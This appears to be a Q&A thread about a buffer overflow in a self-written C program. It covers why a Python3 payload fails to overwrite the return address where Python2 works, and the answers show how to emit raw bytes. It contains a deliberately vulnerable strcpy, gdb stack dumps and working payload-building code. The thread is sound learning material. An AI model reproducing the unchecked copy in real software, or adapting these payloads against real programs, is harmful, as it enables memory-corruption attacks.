6

I'm trying to exploit a simple buffer overflow with gdb and peda. I just want to overwrite the return address with the address of a function in the program. I can easily do it with python2, but it seems to be impossible with python3: the return address is not overwritten with the correct address.

According to the research I have already done, the encoding is the cause of this problem, because python2 uses ascii and python3 uses utf-8. I found some material on this website, but it didn't help me :/

Here is the code of the vulnerable app:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void checkPassword();
void goodPassword();

int main(int argc, char **argv)
{
    printf("Debut du programme...\n");
    if (argc < 2)
    {
        printf("Necessite un argument\n");
        return 0;
    }
    printf("Appel de la fonction checkPassword\n");
    checkPassword(argv[1]);
    printf("Fin du programme\n");
}

void checkPassword(const char *arg)
{
    char password[64];
    strcpy(password, arg);
    if (strcmp(password, "fromage") == 0)
    {
        goodPassword();
    }
    else
    {
        printf("Mauvais mot de passe\n");
    }
}

void goodPassword() // This is the function I want to run, address : 0x565562b2
{
    printf("Mot de passe correcte!\n");
}

Here is the exploit I use in python2:

starti $(python2 -c 'print "A"*76 + "\xb2\x62\x55\x56".strip() ') 

Here is the exploit I use in python3, and the stack after the strcpy:

starti $(python3 -c 'print(b"A"*76 + b"\xb2\x62\x55\x56".strip())')

gdb-peda$ x/24xw $esp
0xffffcc40: 0xffffcc50 0xffffcfa6 0xf7e2bca9 0x56556261
0xffffcc50: 0x41412762 0x41414141 0x41414141 0x41414141
0xffffcc60: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcc70: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcc80: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcc90: 0x41414141 0x41414141 0x41414141 0x785c4141

I expect this output:

gdb-peda$ x/24xw $esp
0xffffcc50: 0xffffcc60 0xffffcfac 0xf7e2bca9 0x56556261
0xffffcc60: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcc70: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcc80: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcc90: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcca0: 0x41414141 0x41414141 0x41414141 0x565562b2

This is the stack I get with the python2 exploit, which works fine and runs the goodPassword function. Thanks for your help.

    2 Answers

    1

    What is starti? Is this a wrapper script around gdb/peda? By what means is the string being generated by python3 being passed to the vulnerable application? Is the shell involved in the middle?

    We expect:

    python -c 'print("\x48\x49\x90\x84\xe3\xe9")' |xxd
    0000000: 4849 9084 e3e9 0a                        HI.....

    But instead python3 gives us:

    python3 -c 'print(str(b"\x48\x49\x90\x84\xe3\xe9","latin-1"))' |xxd
    0000000: 4849 c290 c284 c3a3 c3a9 0a              HI.........

    ...which is functionally equivalent to:

    python3 -c 'import codecs; print(codecs.decode(b"\x48\x49\x90\x84\xe3\xe9","latin-1"))' |xxd
    0000000: 4849 c290 c284 c3a3 c3a9 0a              HI.........

    ...and additionally

    python3 -c 'import codecs; print("".join(chr(x) for x in bytearray("\x48\x49\x90\x84\xe3\xe9".encode("latin-1"))))' |xxd
    0000000: 4849 c290 c284 c3a3 c3a9 0a              HI.........

    ... according to the set of answers provided in the discussion on this link.

    Python 3 strings are Unicode text, so a character encoding is needed to turn them into bytes, and that encoding decides how everything outside the ASCII range is handled. The print() function encodes its output with the encoding of standard output, which is normally UTF-8, so each character from \x80 to \xff is written as a two-byte sequence, as the xxd dumps above show. An informative explanation of this behavior is provided in this answer. In summary, much of this seeming behavioral regression can be traced to the single decision to move from print "something" to print("something") (the builtin print function), removing print from the compiler, discussed here. It is also a result of python3 separating text strings (str) from raw bytes, more information here.
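To make the difference concrete, here is a minimal sketch that reproduces the byte sequences from the xxd dumps above without involving the shell at all. The variable names are only illustrative; the point is that the same text yields different bytes depending on which encoding is applied on the way out.

```python
# The six bytes used in the examples above.
raw = b"\x48\x49\x90\x84\xe3\xe9"

# latin-1 maps each byte 0x00-0xff to the code point with the same value,
# so decoding never fails and is fully reversible.
text = raw.decode("latin-1")

# What print() effectively writes on a UTF-8 terminal (minus the newline):
# every code point above 0x7f becomes two bytes.
as_utf8 = text.encode("utf-8")

# What the exploit actually needs: one byte per code point.
as_latin1 = text.encode("latin-1")

print(as_utf8.hex())    # 4849c290c284c3a3c3a9
print(as_latin1.hex())  # 48499084e3e9
```

The first line of output matches the python3 dumps, the second matches the python2 one.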

    However, I'd like to point out that if you can pass your exploit buffer to your vulnerable application as raw bytes, without print() and the shell sitting between python and your victim app, you will get the bytes you desire from the byte strings in all three python3 examples above.

    A good verification of this is to write to an outfile, and perform a hexdump on the output file. The same would theoretically be true for passing the exploit buffer through a socket connection (?)

    #!/usr/bin/env python3
    sploit = "\x48\x49\x90\x84\xe3\xe9"
    # latin-1 maps code points 0-255 to the identical byte values
    with open("evil.txt", "wb") as F:
        F.write(sploit.encode('latin-1'))
    # no explicit close needed: the with block closes the file

    ...and proof:

    hexdump -C evil.txt
    00000000  48 49 90 84 e3 e9                                 |HI....|
    00000006
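The same idea can be checked for a command-line argument, which is how the vulnerable program in the question receives its input. The sketch below assumes a POSIX system, where subprocess accepts bytes objects in the argument list and hands them to the child unchanged. Since the real binary is not available here, a child Python process stands in for it (a hypothetical substitute) and simply writes its first argument back as raw bytes.

```python
import subprocess
import sys

# Same layout as the question: 76 filler bytes, then the address
# 0x565562b2 in little-endian order.
payload = b"A" * 76 + b"\xb2\x62\x55\x56"

# Stand-in for the vulnerable program (an assumption for this sketch):
# os.fsencode() recovers the exact bytes of argv[1] in the child.
echo_argv = "import os, sys; sys.stdout.buffer.write(os.fsencode(sys.argv[1]))"

# POSIX only: a bytes argument is passed through without any text encoding.
result = subprocess.run(
    [sys.executable, "-c", echo_argv, payload],
    stdout=subprocess.PIPE,
    check=True,
)

# Show the last four bytes the child received.
print(result.stdout[-4:].hex())
```

With the real target, the argument list would name the compiled binary instead of the Python interpreter. Note that an argument can never contain a NUL byte, whichever way it is passed.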

    Python2 is of course much easier to write exploits with than python3 for all of these reasons. And of course, if ever there is a problem with running (or even installing/making available) python2 in the future, we still have a number of other mainstay languages, such as perl:

    perl -e 'print "A"x4 . "\x48\x49\x90\x84\xe3\xe9";' |xxd
    0000000: 4141 4141 4849 9084 e3e9                 AAAAHI....
      1

      From here, it appears to be possible to bypass some issues with python3 print() using

      import sys
      sys.stdout.buffer.write(b"some binary data")

      which writes the bytes directly to stdout. This works on Linux but may have issues on Windows.
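Applied to the question, this could look like the sketch below. The offset of 76 and the address 0x565562b2 are taken from the question. The helper names build_payload and write_payload are made up for illustration. The sketch also shows what print() does with a bytes object: it prints the repr, starting with b', which would explain the 0x41412762 word (b'AA in little-endian order) and the trailing 0x785c4141 (AA\x) in the question's stack dump.

```python
import io
import struct

OFFSET = 76          # filler length used in the question
TARGET = 0x565562b2  # address of goodPassword quoted in the question


def build_payload(offset=OFFSET, target=TARGET):
    """Return the filler followed by the 32-bit little-endian address."""
    return b"A" * offset + struct.pack("<I", target)


def write_payload(stream):
    """Write the raw payload to a binary stream such as sys.stdout.buffer."""
    stream.write(build_payload())
    stream.flush()


payload = build_payload()

# What print(payload) would emit: the textual repr, not the bytes.
printed = str(payload)
print(printed[:6], "...", printed[-8:])

# Demonstration with an in-memory stream standing in for sys.stdout.buffer.
sink = io.BytesIO()
write_payload(sink)
print(sink.getvalue()[-4:].hex())
```

In a real run, a script (say a hypothetical exploit.py) would call write_payload(sys.stdout.buffer), and gdb would be started with starti $(python3 exploit.py). This works here because the payload contains no NUL bytes or whitespace that the shell would drop or split on.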
